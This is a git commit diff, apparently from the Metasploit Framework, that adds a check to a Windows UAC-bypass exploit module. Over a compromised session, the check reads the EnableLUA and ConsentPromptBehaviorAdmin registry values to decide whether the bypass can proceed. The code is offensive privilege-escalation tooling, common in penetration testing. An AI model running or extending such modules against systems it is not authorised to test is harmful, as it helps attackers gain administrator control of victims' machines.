Merge branch 'mubix-bypassuac_uac_check'

2012-10-06 02:09:16 -05:00 · 2012-10-06 02:09:16 -05:00 · e02adc1f35
parent 33429c37fd 55474dd8bf
commit e02adc1f35
1 changed files with 29 additions and 1 deletions
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@ -60,7 +60,35 @@ class Metasploit3 < Msf::Exploit::Local
 			end
 		}
 		if not vuln
-			print_error("#{winver} is not vulnerable.")
+			print_error("#{winver} does not have UAC")
+			return
+		end
+
+		root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
+		open_key = session.sys.registry.open_key(root_key, base_key)
+		lua_setting = open_key.query_value('EnableLUA')
+
+		if lua_setting.data == 1
+			print_status "UAC is Enabled, checking level..."
+		else
+			print_error "UAC is not enabled, no reason to run module, exiting..."
+			print_error "Run exploit/windows/local/ask to elevate"
+			return
+		end
+
+		uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
+
+		case uac_level.data
+		when 2
+			print_error "UAC is set to 'Always Notify'"
+			print_error "This module does not bypass this setting, exiting..."
+			return
+		when 5
+			print_good "UAC is set to Default"
+			print_good "BypassUAC can bypass this setting, continuing..."
+		when 0
+			print_error "UAC is not enabled, no reason to run module"
+			print_error "Run exploit/windows/local/ask to elevate"
 			return
 		end